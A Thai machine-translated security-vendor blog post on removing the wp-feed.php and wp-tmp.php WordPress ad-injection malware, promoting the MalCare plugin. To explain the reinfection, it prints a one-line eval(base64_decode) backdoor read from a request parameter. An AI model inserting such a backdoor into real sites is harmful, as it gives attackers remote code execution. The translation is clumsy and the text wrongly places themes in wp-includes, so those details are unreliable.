แก้ไขมัลแวร์ Wp-Feed.php และ Wp-Tmp.php ใน WordPress - MalCare

เผยแพร่แล้ว: 2023-04-19

โปรแกรมสแกนมัลแวร์ของคุณแจ้งเตือนคุณหรือไม่ว่า “ไซต์ของคุณถูกแฮ็ก” แต่คุณก็ดูดี

ผู้เยี่ยมชมบ่นเกี่ยวกับโฆษณาสแปมบนเว็บไซต์ WordPress ของคุณ แต่คุณไม่เห็นเลยหรือ

มีโอกาสสูงที่ไซต์ของคุณจะถูกแฮ็ก

แฮ็กเกอร์หา วิธีที่ชาญฉลาดในการปลอมแปลงการแฮ็กของตน จากเจ้าของเว็บไซต์ เพื่อให้ไม่ถูกตรวจจับ และพวกเขาสามารถใช้ประโยชน์จากเว็บไซต์ต่อไปได้เป็นเวลานาน

wp-feed.php เป็นหนึ่งในแฮ็กปลอมตัวที่ฉลาดที่สุด

ซ่อนจากเจ้าของไซต์ แสดงโฆษณาผลิตภัณฑ์ผิดกฎหมาย ยาเสพติด และเนื้อหาสำหรับผู้ใหญ่แก่ผู้เยี่ยมชมของคุณ

แม้ว่าคุณจะสามารถตรวจจับได้ แต่การค้นหาทุกตำแหน่งที่การติดเชื้อแพร่กระจายไปนั้นไม่เพียงแต่ยากเท่านั้น แต่บางครั้งก็เป็นไปไม่ได้ด้วย การกำจัดเชื้อนั้นซับซ้อนและยาก หากคุณสามารถลบมันออกได้ ใน 8 ใน 10 กรณี การติดไวรัสจะปรากฏขึ้นอีกครั้ง

บรรทัดล่างสุด: เป็นการยากที่จะลบการติดไวรัส wp-feed.php จากเว็บไซต์ WordPress

โชคดีที่เราได้จัดการกับมัลแวร์นี้นับครั้งไม่ถ้วนมาก่อน ในช่วงทศวรรษที่ผ่านมา เราไม่เพียงแต่ประสบความสำเร็จในการลบ wp-feed ออกจากเว็บไซต์ WordPress นับแสนแห่งเท่านั้น แต่ยังป้องกันการติดไวรัสซ้ำอีกด้วย

ไม่ต้องกังวล. คุณอยู่ในมือที่ดี

ในบทความนี้ คุณจะได้เรียนรู้:

  • มัลแวร์ wp-feed.php ทำงานอย่างไรและส่งผลกระทบต่อเว็บไซต์ของคุณอย่างไร
  • วิธีลบออกจากไซต์ของคุณ
  • วิธีป้องกันการติดเชื้อซ้ำในอนาคต

TL;DR : หากต้องการลบการติดไวรัส wp-feed.php สิ่งที่คุณต้องทำคือติดตั้งโปรแกรม กำจัดมัลแวร์ WordPress และเรียกใช้ฟังก์ชัน Auto-Clean ปลั๊กอินยังช่วยป้องกันการติดไวรัสซ้ำด้วยการลบแบ็คดอร์ของเว็บไซต์ซึ่งเปิดใช้งานการติดไวรัสซ้ำและบล็อกการรับส่งข้อมูลที่เป็นอันตรายไม่ให้เข้าถึงไซต์ของคุณด้วยไฟร์วอลล์และการป้องกันการเข้าสู่ระบบ

wp-feed.php & wp-tmp.php คืออะไร (สาเหตุ อาการ และการติดเชื้อซ้ำ)

สรุป: WP-Feed เป็นมัลแวร์ประเภทหนึ่งที่แสดงโฆษณาที่เป็นอันตรายบนเว็บไซต์ เป้าหมายคือให้ผู้เยี่ยมชมคลิกโฆษณาและเปลี่ยนเส้นทางไปยังเว็บไซต์ที่เป็นอันตราย

คุณต้องสงสัย -

> เว็บไซต์ของฉันติดไวรัสได้อย่างไร?

โดยทั่วไปการติดไวรัสเกิดจากการใช้ ปลั๊กอินหรือธีมที่เป็นโมฆะ

ซอฟต์แวร์ Null นั้นน่าดึงดูดใจที่จะใช้เพราะพวกเขาเสนอคุณสมบัติระดับพรีเมียมให้คุณโดยไม่เสียค่าใช้จ่าย หลายคนเชื่อว่าการแจกจ่ายซอฟต์แวร์ที่เป็นโมฆะนั้นเป็นการแสดงความเมตตากรุณา

ซึ่งมักจะห่างไกลจากกรณีนี้ มีการแจกจ่ายซอฟต์แวร์ Nulled เพื่อให้แฮ็กเกอร์สามารถเข้าถึงไซต์ของคุณได้อย่างง่ายดาย

ปลั๊กอินหรือธีมที่เป็นโมฆะเต็มไปด้วยมัลแวร์ เมื่อคุณติดตั้งธีมหรือปลั๊กอินที่เป็นโมฆะบนเว็บไซต์ของคุณ โดยทั่วไปแล้วคุณกำลังเปิดประตูให้แฮ็กเกอร์เข้าถึงไซต์ของคุณ

นอกจากซอฟต์แวร์ที่เป็นโมฆะแล้ว ปลั๊กอินและธีมที่ล้าสมัย ก็อาจมีช่องโหว่ได้เช่นกัน แฮ็กเกอร์ใช้ประโยชน์จากช่องโหว่เหล่านี้เพื่อเจาะเข้าไปในไซต์ของคุณ

พวกเขายังใช้ ชื่อผู้ใช้และรหัสผ่านที่ไม่รัดกุม เช่น “admin” และ “p@ssword” ข้อมูลรับรองที่อ่อนแอสามารถคาดเดาได้ง่าย

แฮ็กเกอร์สามารถเดาชื่อผู้ใช้และชื่อล็อกอินของคุณ และฝังมัลแวร์ wp-feed.php ลงในเว็บไซต์ของคุณโดยตรง

> เหตุใดแฮ็กเกอร์จึงแพร่ระบาดในไซต์ด้วย wp-feed.php

เป้าหมายคือการขโมยผู้เยี่ยมชมของคุณและหลอกล่อให้พวกเขาซื้อบริการหรือผลิตภัณฑ์ปลอมเพื่อให้แฮ็กเกอร์สามารถสร้างรายได้

สิ่งที่น่าทึ่งอย่างแท้จริงคือวิธีที่พวกเขาสามารถบรรลุสิ่งนี้ได้โดยที่เจ้าของเว็บไซต์ไม่ได้รับคำใบ้แม้แต่คำเดียว

ซึ่งนำเราไปสู่คำถาม -

> ทำไมจึงยากที่จะสังเกตเห็นอาการติดเชื้อนี้?

เมื่อแฮ็กเกอร์เข้าถึงเว็บไซต์ของคุณได้ พวกเขาฝังไฟล์สองไฟล์ (wp-feed.php & wp-tmp.php) ลงในโฟลเดอร์ wp-includes ของคุณ

โฟลเดอร์ wp-includes เป็นส่วนหนึ่งของคอร์ WordPress ของคุณ เป็นที่ตั้งธีมของเว็บไซต์ของคุณ

ไฟล์ฟีด WP เริ่มติดไวรัสไฟล์ WordPress อื่นๆ โดยเฉพาะ function.php ซึ่งเป็นส่วนหนึ่งของธีมที่คุณใช้งานอยู่

function.php filezilla

จากภายใน function.php แฮ็กเกอร์สามารถแสดงโฆษณาป๊อปอัปที่เป็นอันตรายบนเว็บไซต์ WordPress ของคุณได้

ส่วนที่น่ากลัวจริงๆ ก็คือ โฆษณาจะแสดงต่อผู้เข้าชมใหม่เท่านั้น ไม่ใช่ผู้เข้าชมซ้ำ มัลแวร์จะบันทึกผู้เยี่ยมชมไซต์ของคุณเพื่อให้แน่ใจว่าโฆษณาจะแสดงเฉพาะผู้เยี่ยมชมรายใหม่เท่านั้น นี่เป็นวิธีป้องกันการตรวจจับที่แยบยล

มัลแวร์ wp-feed

ดังนั้น ในฐานะผู้เยี่ยมชมไซต์ของคุณเป็นประจำ คุณจึงไม่เคยสังเกตเห็นอาการใดๆ ของการถูกแฮ็ก

วิธีทำความสะอาดมัลแวร์ wp-feed.php

มีสองวิธีในการกำจัดการติดเชื้อ นั่นคือ -

1. การใช้ปลั๊กอิน (ง่าย)

2. ทำด้วยตนเอง (ยาก)

มาดูแต่ละวิธีกัน

1. การลบมัลแวร์ WP-Feed.php ด้วยปลั๊กอิน (วิธีที่ง่าย)

บางท่านอาจติดตั้งปลั๊กอินความปลอดภัยบนเว็บไซต์ของคุณแล้ว อาจเป็นปลั๊กอินนี้ที่แจ้งเตือนคุณเกี่ยวกับไฟล์ที่เป็นอันตราย – wp-includes/wp-feed.php และ wp-includes/wp-tmp.php

ปลั๊กอินความปลอดภัยส่วนใหญ่เสนอบริการกำจัดมัลแวร์ แต่มีเพียงไม่กี่ตัวเท่านั้นที่สามารถทำได้อย่างรวดเร็วและมีประสิทธิภาพเท่ากับ MalCare Security

  • MalCare จะทำความสะอาดไซต์ของคุณภายใน 60 วินาที คุณไม่จำเป็นต้องเพิ่มตั๋ว คุณไม่ต้องรอคิว คุณไม่จำเป็นต้องมอบข้อมูลประจำตัวของไซต์ของคุณให้กับปลั๊กอินของบุคคลที่สาม
  • ไม่เพียงแค่นั้น ปลั๊กอินยังเข้าไปในทุกซอกทุกมุมเพื่อค้นหามัลแวร์ที่ซ่อนอยู่ พบ ทุกสคริปต์ที่เป็นอันตราย ในไซต์ของคุณ
  • มันใช้วิธีการที่ไม่ใช่แบบดั้งเดิมเพื่อ ตรวจหามัลแวร์ใหม่และที่ซ่อนอยู่อย่างดี โดยจะวิเคราะห์พฤติกรรมของโค้ดอย่างละเอียดเพื่อระบุเจตนาร้าย สิ่งนี้ยังช่วยให้แน่ใจว่าโค้ดนั้น ไม่ได้ทำเครื่องหมายว่าโค้ดดีเป็นแย่
  • มันทำทั้งหมดนั้น ภายในระยะเวลาไม่กี่นาที

มาล้างการติดเชื้อ wp-feed.php ด้วย MalCare กันเถอะ

ขั้นตอนที่ 1: ติดตั้งและเปิดใช้งาน MalCare Security บนเว็บไซต์ WordPress ของคุณ

ขั้นตอนที่ 2: จากเมนูแดชบอร์ดของคุณ เลือก MalCare ป้อนที่อยู่อีเมลของคุณ และคลิกที่ Secure Site Now

เว็บไซต์ malcare ปลอดภัยในขณะนี้

ขั้นตอนที่ 3: ในหน้าถัดไป ระบบจะขอให้คุณ ป้อนรหัสผ่าน จากนั้นให้ ป้อน URL ของคุณ

MalCare จะเริ่มสแกนเว็บไซต์ของคุณทันที จุดประสงค์คือเพื่อค้นหาทุกอินสแตนซ์ของโค้ดที่เป็นอันตรายบนเว็บไซต์ของคุณ

ซึ่งหมายความว่าจะไม่เพียงแค่ตรวจหาไฟล์ wp-feed.php และ wp-tmp.php เท่านั้น แต่ยังตรวจหาโค้ดที่เป็นอันตรายทั้งหมดที่ติดไวรัสในไฟล์ WordPress ของคุณ รวมถึงอินสแตนซ์ที่ซ่อนอยู่ในไฟล์ function.php

คุณสามารถวางใจได้ว่าปลั๊กอินจะค้นหาแบ็คดอร์ทุกตัวที่มีอยู่ในไซต์ของคุณ เพื่อป้องกันการติดไวรัสซ้ำ

เพิ่มไซต์

เมื่อพบสคริปต์ที่เป็นอันตราย ปลั๊กอินจะแจ้งเตือนคุณ

ถัดไป คุณต้องทำความสะอาดไซต์ของคุณ

มัลแวร์รักษาความปลอดภัย

โปรดทราบ ว่า การกำจัดมัลแวร์ ของ MalCare เป็นคุณสมบัติระดับพรีเมียม เป็น ปลั๊กอินกำจัดมัลแวร์ เพียงตัวเดียว ที่มีอยู่ ด้วยราคา $99 ต่อปี คุณสามารถทำความสะอาดไซต์เดียวกี่ครั้งก็ได้ตามต้องการ และมั่นใจได้ว่าจะได้รับการป้องกันที่ดีที่สุด เรียนรู้เพิ่มเติมเกี่ยวกับ ราคา MalCare

ขั้นตอนที่ 4: หากต้องการลบทุกร่องรอยของ wp-feed.php จากเว็บไซต์ของคุณ สิ่งที่คุณต้องทำคือคลิกที่ปุ่ม ล้างอัตโนมัติ

MalCare จะเริ่มทำความสะอาดไซต์ของคุณทันที

Malcare ทำความสะอาดอัตโนมัติ

แค่นั้นแหละ นั่นเป็นวิธีที่คุณทำความสะอาดเว็บไซต์ของคุณด้วยปลั๊กอิน

2. ลบมัลแวร์ WP-Feed.php ด้วยตนเอง (วิธีที่ยาก)

การกำจัดการติดเชื้อด้วยตนเองนั้นค่อนข้างท้าทาย เพราะในการติดเชื้อประเภทนี้ มีชิ้นส่วนที่เคลื่อนไหวจำนวนมาก

  • แฮ็กเกอร์อัปโหลดไฟล์ที่เป็นอันตรายสองไฟล์ – wp-feed.php & wp-tmp.php คุณต้องลบออกเพื่อเริ่มต้น นี่อาจเป็นเพียงส่วนเดียวที่ง่าย
  • การแพร่ระบาดแพร่กระจายไปยังไฟล์ WordPress อื่นๆ รวมถึงไฟล์ function.php นี่เป็นเรื่องยากเพราะใครจะบอกว่าการติดเชื้อแพร่กระจายไปที่ใด
    • จะใช้เวลาหลายชั่วโมงในการค้นหารหัสที่เป็นอันตรายทั้งหมด
    • การตรวจหารหัสที่เป็นอันตรายนั้นทำได้ยาก เนื่องจากมีการปลอมแปลงอย่างดีและดูเหมือนรหัสทั่วไป
    • โค้ดอันตรายที่รู้จัก เช่น “eval(base64_decode)” อาจเป็นส่วนหนึ่งของปลั๊กอินที่ถูกต้อง พวกเขาไม่ได้ใช้ในทางที่เป็นอันตราย ดังนั้น การลบโค้ดจะส่งผลต่อปลั๊กอินของคุณและอาจทำให้ไซต์ของคุณเสียหายได้
    • มีโอกาสค่อนข้างดีที่คุณจะพลาดโค้ดบางส่วนที่อาจนำไปสู่การติดไวรัสซ้ำ

การกำจัดด้วยตนเองจึงไม่ได้ผลเลย

อย่างไรก็ตาม หากคุณยังต้องการดำเนินการ โปรดสำรองข้อมูลเว็บไซต์ของคุณให้สมบูรณ์ หากคุณเผลอลบบางสิ่งโดยไม่ตั้งใจและทำให้ไซต์ของคุณเสียหาย คุณสามารถคืนค่าให้เป็นปกติได้อย่างรวดเร็ว

นี่คือรายการบริการสำรองข้อมูลที่ดีที่สุดที่คุณสามารถเลือกได้

และนี่คือบทความที่จะช่วยคุณลบมัลแวร์ด้วยตนเอง – WordPress ถูกแฮ็ก เพียงข้ามไปที่ส่วน “วิธีทำความสะอาดเว็บไซต์ WordPress ที่ถูกแฮ็กด้วยตนเอง”

เว็บไซต์ของคุณปราศจากการติดไวรัสแล้ว แต่ยังไม่ปลอดภัย แฮ็กเกอร์ยังคงสามารถกำหนดเป้าหมายไซต์ของคุณและพยายามแพร่เชื้อได้ คุณต้องแน่ใจว่าไซต์ของคุณได้รับการปกป้องจากการติดไวรัสในอนาคต แต่ก่อนที่เราจะพูดถึงเรื่องนั้น เรามาดูผลกระทบของการติดไวรัส wp-feed.php & wp-tmp.php กันก่อน

ผลกระทบของการติดเชื้อมัลแวร์ wp-temp.php

ไม่จำเป็นต้องพูดว่าการมีมัลแวร์ wp-feed.php & wp-tmp.php สามารถส่งผลกระทบร้ายแรงต่อเว็บไซต์ของคุณ

เว็บไซต์ที่ติด wp-temp.php มักจะได้รับผลกระทบดังต่อไปนี้:

  • คุณจะสังเกตเห็นการ เพิ่มขึ้นในอัตราตีกลับ และ การลดลงของเวลาที่ผู้เยี่ยมชม ใช้บนเว็บไซต์ของคุณ
  • โฆษณาป๊อปอัปจะทำให้ เว็บไซต์ของคุณหนักและช้ามาก
  • ไม่มีใครชอบเว็บไซต์ที่ทำงานช้า ดังนั้นผู้เข้าชมมักจะ กดปุ่มย้อนกลับ ก่อนที่หน้าของคุณจะโหลดบนเบราว์เซอร์ สิ่งนี้จะเกิดผลกระทบแบบโดมิโน
  • เครื่องมือค้นหาจะสังเกตเห็นว่าผู้คนออกจากไซต์ของคุณเร็วเพียงใด พวกเขาจะสรุปว่าคุณไม่ได้เสนอสิ่งที่ผู้ใช้ค้นหา อันดับเครื่องมือค้นหาของคุณจะลดลง
  • ซึ่งหมายความว่าความ พยายาม เวลา และเงิน ทั้งหมดที่คุณอาจต้อง เสีย ไปเพื่อให้อันดับสูงขึ้นใน SERPs

บัญชีดำของ Google

  • เว็บไซต์ที่ถูกแฮ็ก ถูกขึ้นบัญชีดำ โดย Google และ ถูกระงับ โดยผู้ให้บริการโฮสติ้ง นอกจากนี้ หากไซต์ที่ถูกแฮ็กใช้งานโฆษณา Google บัญชี AdWords จะถูกระงับ ทั้งหมดนี้จะนำไปสู่การจุ่มลงในการจราจร
  • ยิ่งไปกว่านั้น เว็บไซต์ที่ถูกแฮกต้องได้รับการทำความสะอาดซึ่งอาจเป็น เรื่องราคาแพง หากคุณไม่ได้ใช้เครื่องมือที่เหมาะสม

ข่าวดีก็คือคุณรู้ว่าไซต์ของคุณถูกแฮ็ก คุณจึงสามารถทำความสะอาดและหยุดการกระแทกได้

จะปกป้องไซต์ของคุณจากมัลแวร์ wp-feed.php ได้อย่างไรในอนาคต

ผู้อ่านของเราหลายคนอาจพยายามลบมัลแวร์ wp-feed.php ออกจากไซต์ของตน เพียงเพื่อจะพบว่ามัลแวร์ยังคงกลับมาอีก

สิ่งนี้เกิดขึ้นเนื่องจากมีการติดตั้งแบ็คดอร์บนไซต์ของคุณ แบ็คดอร์ส่วนใหญ่จะปลอมแปลงได้ดีมาก มากจนนักพัฒนามือสมัครเล่นส่งต่อเป็นรหัสที่ถูกต้องได้

ในส่วนก่อนหน้านี้ เราได้อธิบายว่าแฮ็กเกอร์แทรกไฟล์สองไฟล์ ได้แก่ wp-feed.php & wp-tmp.php ลงในโค้ดเว็บไซต์ของคุณ ไฟล์ wp-tmp.php ทำหน้าที่เป็นประตูหลัง หากคุณเปิดไฟล์ คุณจะพบสคริปต์ที่มีลักษณะดังนี้ –

 $p = $REQUEST$#91;”m”]; eval(base64_decode ($p));

ข่าวดีก็คือคุณสามารถปกป้องไซต์ของคุณจากการพยายามแฮ็คในอนาคตได้โดยใช้มาตรการต่อไปนี้ –

1. ลบซอฟต์แวร์ Nulled และหยุดใช้งาน

หากคุณใช้ปลั๊กอินหรือธีมที่ไม่มีค่าบนเว็บไซต์ของคุณ ให้ลบออกทันที

แฮ็กเกอร์เข้าถึงไซต์ของคุณโดยใช้ซอฟต์แวร์ที่เป็นโมฆะในตอนแรก ไม่ว่าคุณจะทำความสะอาดไซต์ของคุณดีเพียงใด หากคุณไม่ลบซอฟต์แวร์ที่เป็นโมฆะ แฮ็กเกอร์จะหาทางเข้าไปในไซต์ของคุณและฝังมัลแวร์

หากคุณให้สิทธิ์ผู้ใช้ในการติดตั้งปลั๊กอินและธีม ตรวจสอบให้แน่ใจว่าผู้ใช้ไม่เคยใช้ซอฟต์แวร์ที่เป็นโมฆะ

อันที่จริง จะเป็นการดีกว่าหากฝึกฝนเพื่อ ป้องกันการติดตั้งปลั๊กอินและธีมทั้งหมด ด้วยความช่วยเหลือของ MalCare

สิ่งที่คุณต้องทำคือลงชื่อเข้าใช้แดชบอร์ดของ MalCare เลือกเว็บไซต์ของคุณ คลิกที่ Apply Hardening และเปิดใช้งาน Block Plugin/Theme Installation

บล็อกการติดตั้งปลั๊กอินหรือธีม

2. เพิ่มความปลอดภัยให้เว็บไซต์ของคุณ

คุณสามารถป้องกันแฮ็กเกอร์จากการฝังไฟล์ที่เป็นอันตราย เช่น wp-feed.php ลงในโฟลเดอร์ WordPress ของคุณโดย การเปลี่ยนสิทธิ์ของไฟล์

สิทธิ์ของไฟล์คือชุดของกฎที่กำหนดว่าใครสามารถเข้าถึงไฟล์ใดได้บ้าง คุณสามารถบล็อกผู้ใช้ไม่ให้แก้ไขโฟลเดอร์ wp-includes หากต้องการทำความเข้าใจสิทธิ์ของไฟล์ในเชิงลึก โปรดดูคู่มือนี้: WordPress File Permissions

เปลี่ยนตัวจัดการไฟล์สิทธิ์

คุณยังสามารถบล็อกไม่ให้แฮ็กเกอร์แก้ไขธีมของคุณโดย ปิดใช้งานโปรแกรมแก้ไขไฟล์ สิ่งนี้จะป้องกันไม่ให้พวกเขาฉีดโฆษณาป๊อปอัปบนเว็บไซต์ของคุณ คุณสามารถทำได้ด้วยตนเองแต่มีความเสี่ยงและไม่แนะนำ

หากคุณติดตั้ง MalCare บนไซต์ของคุณแล้ว สิ่งที่คุณต้องทำคือคลิกปุ่มเพื่อปิดใช้งานโปรแกรมแก้ไขไฟล์

ปิดใช้งานตัวแก้ไขไฟล์

เรียนรู้เพิ่มเติมเกี่ยวกับการชุบแข็ง WordPress

3. อัปเดตเว็บไซต์ของคุณอยู่เสมอ

เช่นเดียวกับซอฟต์แวร์อื่น ๆ ปลั๊กอิน WordPress และธีมพัฒนาช่องโหว่ เมื่อนักพัฒนาทราบเกี่ยวกับช่องโหว่นี้ พวกเขาจะสร้างแพตช์อย่างรวดเร็วและเผยแพร่ในรูปแบบของการอัปเดต

หากมีความล่าช้าในการดำเนินการอัปเดต ไซต์ของคุณมีความเสี่ยง

แฮ็กเกอร์สามารถใช้ช่องโหว่ได้ดี ในความเป็นจริง พวกเขามักจะมองหาเว็บไซต์ที่มีช่องโหว่อยู่เสมอ เพื่อให้พวกเขาสามารถใช้มันเพื่อเข้าถึงไซต์และทำให้ไซต์ติดมัลแวร์

ดังนั้นอย่าล่าช้าในการอัปเดต

คุณสามารถเรียนรู้เพิ่มเติมเกี่ยวกับการอัปเดตความปลอดภัยได้จากที่นี่ – WordPress Security Updates

ต่อไปนี้เป็นคำแนะนำที่จะช่วยให้คุณอัปเดตไซต์อยู่เสมอ – วิธีอัปเดต WordPress

4. บังคับใช้ข้อมูลประจำตัวที่แข็งแกร่ง

วิธีที่ง่ายที่สุดในการเข้าถึงเว็บไซต์ของคุณคือผ่านหน้าเข้าสู่ระบบของคุณ

แฮ็กเกอร์เพียงแค่ต้องคาดเดาข้อมูลรับรองผู้ใช้ของคุณให้สำเร็จ อันที่จริงแล้ว พวกเขาออกแบบบอทที่สามารถลองใช้ชุดชื่อผู้ใช้และรหัสผ่านหลายร้อยชุดภายในระยะเวลาไม่กี่นาที หากคุณหรือเพื่อนร่วมทีมคนใดของคุณใช้ข้อมูลรับรองที่เดาง่าย เช่น “admin” และ “password123” บอทจะใช้เวลา 2 วินาทีในการละเมิดไซต์ของคุณ สิ่งนี้เรียกว่าการโจมตีด้วยกำลังดุร้าย

สิ่งสำคัญคือต้องแน่ใจว่าผู้ใช้ทุกคนในเว็บไซต์ของคุณใช้ชื่อผู้ใช้ที่ไม่ซ้ำกันและรหัสผ่านที่รัดกุม

คุณยังสามารถดำเนินการนอกเหนือจากนี้และใช้มาตรการต่าง ๆ เพื่อปกป้องหน้าเข้าสู่ระบบของคุณ เราได้รวบรวมรายการมาตรการรักษาความปลอดภัยในการเข้าสู่ระบบ WordPress ที่คุณสามารถทำได้

5. ใช้ไฟร์วอลล์

คงจะดีไม่น้อยหากคุณสามารถป้องกันไม่ให้แฮ็กเกอร์เข้าถึงเว็บไซต์ของคุณได้ตั้งแต่แรก

ไฟร์วอลล์เป็นเพียงเครื่องมือที่คุณต้องการ

จะ ตรวจสอบการเข้าชม ที่ต้องการเข้าถึงไซต์ของคุณ หากตรวจพบว่าการรับส่งข้อมูลมาจากที่อยู่ IP ที่เป็นอันตราย ไฟร์วอลล์จะบล็อกการรับส่งข้อมูลในทันที

ด้วยวิธีนี้ จะกรองแฮ็กเกอร์และบอทออก

นี่คือรายการไฟร์วอลล์ WordPress ที่ดีที่สุดที่คุณสามารถเปิดใช้งานบนไซต์ของคุณได้

อย่างไรก็ตาม หากคุณใช้ MalCare แสดงว่าคุณได้เปิดใช้งานไฟร์วอลล์บนไซต์ของคุณแล้ว

ไฟร์วอลล์มัลแวร์

อะไรต่อไป?

เราได้แสดงวิธีทำความสะอาดเว็บไซต์ของคุณและวิธีทำให้มั่นใจว่าคุณจะไม่ถูกแฮ็กอีก

คำแนะนำที่เราคิดว่าจะช่วยเว็บไซต์ของคุณจากภัยพิบัติต่างๆ ได้คือ – ทำการสำรองข้อมูลเว็บไซต์ของคุณเป็นประจำ

ไม่ว่าเว็บไซต์ของคุณจะเกิดข้อผิดพลาดกะทันหันหรือเว็บไซต์เสียหาย การสำรองข้อมูลจะช่วยให้คุณแก้ไขเว็บไซต์ชั่วคราวได้อย่างรวดเร็ว

หากคุณสมัครใช้บริการ MalCare Security คุณสามารถใช้ส่วนเสริมสำรองได้โดยมีค่าใช้จ่ายเพิ่มเติม ติดต่อเราเพื่อเรียนรู้เพิ่มเติม

ให้ ปลั๊กอิน MalCare Security หมุน!